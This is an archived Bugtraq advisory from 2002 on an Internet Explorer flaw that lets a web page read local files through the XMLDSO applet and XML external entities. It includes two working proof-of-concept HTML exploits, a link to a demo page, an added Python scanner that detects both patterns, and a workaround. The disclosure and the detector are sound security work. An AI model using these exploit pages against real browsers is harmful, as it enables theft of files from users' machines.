Bugtraq mailing list archives

Internet explorer can read local files


From: "Jelmer" <jelmer () kuperus xs4all nl>
Date: Sat, 17 Aug 2002 19:57:32 +0200

      .---.        .----------
     /     \  __  /    ------
    / /     \(  )/    -----
   //////   ' \/ `   ---
  //// / // :    : ---
 // /   /  /`    '--
//          //..\\
       ====UU====UU====
           '//||\\`   b


Description :

There is a bug in Internet Explorer which allows reading and sending of
local files.
The problem lies in a legacy XML Datasource applet shipped with Internet
Explorer since its 4.0 release.

It is used in a page like this:

<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
MAYSCRIPT="true">

</applet>

As you can see, you don't specify a jar or cab file from which the class is
loaded; apparently it is added to the classpath from a local file.
It gets nasty when you add a <base href="file:///C:/"> tag to the head
section: the applet now thinks its codebase is local
and you are allowed to read local XML files.
So this snippet will read c:\jelmer.xml:

<html>
<head>
 <!-- the base tag makes the applet treat C:\ as its codebase -->
 <base href="file:///C:/">
</head>
<body>
 <!-- no archive/codebase given: the XMLDSO class comes from the local classpath -->
 <applet code="com.ms.xml.dso.XMLDSO.class" width="100%" height="50" id="xmldso"
MAYSCRIPT="true">
  <!-- resolved against the base href, i.e. file:///C:/jelmer.xml -->
  <PARAM NAME="url" VALUE="jelmer.xml">
 </applet>
 <script language="javascript">
  // give the applet time to load the document before reading it
  setTimeout("showIt()",2000);
  function showIt() {
   var jelmer = xmldso.getDocument();
   alert(jelmer.Text);
  }
 </script>
</body>
</html>

Reading local XML files is bad enough, but there is more that can be done.
XML has a feature called external entities which allows you to combine
multiple files into one big file.
This allows us to read text files as well, as shown by the following example:

<html>
<head>
 <base href="file:///C:/">
</head>
<body>
 <!-- with no url PARAM the applet parses the XML placed in its body -->
 <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
MAYSCRIPT="true">
  <?xml version="1.0"?>
  <!DOCTYPE file  [
    <!ELEMENT file (#PCDATA) >
    <!-- external entity: the parser pulls the text file in as the entity's value -->
    <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
  ]>
  <file>
  &contents;
  </file>
 </applet>
 <script language="javascript">
  setTimeout("showIt()",2000);
  function showIt() {
   var jelmer = xmldso.getDocument();
   alert(jelmer.Text);
  }
 </script>
</body>
</html>
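The two patterns above (an XMLDSO applet under a file:// base href, and an XMLDSO applet carrying a SYSTEM entity that points at file://) can be flagged in a page with a small content scanner. The scanner below is an added example written for this archive page, not code from the original post; it uses only the Python standard library, and its sample inputs are trimmed copies of the advisory's own snippets plus one constructed benign page.

```python
import re
from html.parser import HTMLParser

# Indicators taken from the advisory: the XMLDSO applet class and SYSTEM entities.
XMLDSO_CLASS = "com.ms.xml.dso.xmldso.class"
ENTITY_RE = re.compile(r'<!ENTITY\s+\w+\s+SYSTEM\s+"([^"]*)"', re.IGNORECASE)


class _TagCollector(HTMLParser):
    """Records a file:// <base href> and an XMLDSO <applet> in one pass."""

    def __init__(self):
        super().__init__()
        self.local_base = False
        self.xmldso_applet = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "base" and a.get("href", "").lower().startswith("file:"):
            self.local_base = True
        if tag == "applet" and a.get("code", "").lower() == XMLDSO_CLASS:
            self.xmldso_applet = True


def scan_page(html):
    """Return labels for the advisory's two patterns found in an HTML page."""
    tags = _TagCollector()
    tags.feed(html)
    # The DTD sits inside the applet body, which html.parser only sees as
    # declarations and bogus comments, so the entity URLs are pulled by regex.
    file_entities = [u for u in ENTITY_RE.findall(html)
                     if u.lower().startswith("file:")]
    findings = []
    if tags.xmldso_applet and tags.local_base:
        findings.append("xmldso-local-base")
    if tags.xmldso_applet and file_entities:
        findings.append("xmldso-file-entity:" + ",".join(file_entities))
    return findings


# Sample inputs: trimmed copies of the advisory's two snippets, plus a constructed benign page.
LOCAL_XML_PAGE = """<html><head><base href="file:///C:/"></head><body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="100%" height="50" id="xmldso" MAYSCRIPT="true">
<PARAM NAME="url" VALUE="jelmer.xml"></applet></body></html>"""
ENTITY_PAGE = """<html><head><base href="file:///C:/"></head><body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?><!DOCTYPE file [ <!ELEMENT file (#PCDATA) >
  <!ENTITY contents SYSTEM "file:///C:/jelmer.txt"> ]><file>&contents;</file></applet></body></html>"""
BENIGN_PAGE = '<html><head><base href="http://example.invalid/"></head><body></body></html>'
```

scan_page returns an empty list for the benign page and one label per matched pattern otherwise, so it can be dropped into a proxy or mail-gateway content check as-is.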


Systems affected :

The exploit has been confirmed to work on Windows 2000 and Windows XP, both
fully patched.
However, I believe it will work on any IE browser since the 4.0 release.

Example :

A demonstration of the issue described is available at:

http://www.xs4all.nl/~jkuperus/msieread.htm

It reads and displays the contents of c:\jelmer.txt.

Vendor status :

Microsoft was notified 2 days ago; I have yet to receive a reply.
I really don't care to wait any longer. The fact that I am still a bit
disgruntled that they didn't have the
decency to reply to the Microsoft Help buffer overflow issue I reported to
them (which is exploitable) may have influenced
my patience a little. That's trustworthy computing for you: they spend 100s
of millions on making Microsoft products more secure,
yet when reporting vulnerabilities to them, as Drew Copley put it,

"One would think there was one guy doing it all and this
guy isn't coming into work."

Workaround :

Disable Java altogether, or install the Sun JDK; it does not seem to be affected.

References :

http://www.webdeveloper.com/html/html_xml_3.html

Previous vulnerabilities :

"Macromedia flash! local file reading"
  http://online.securityfocus.com/archive/1/286625

"Winamp allows execution of arbitrary code"
  http://online.securityfocus.com/archive/1/283018

"ICQ allows execution of arbitrary code"
  http://online.securityfocus.com/archive/1/282631

"Windows media player allows execution of arbitrary code"
  http://online.securityfocus.com/bid/5107

"MS XMLHTTP component allows local file reading"
  http://online.securityfocus.com/archive/1/245687
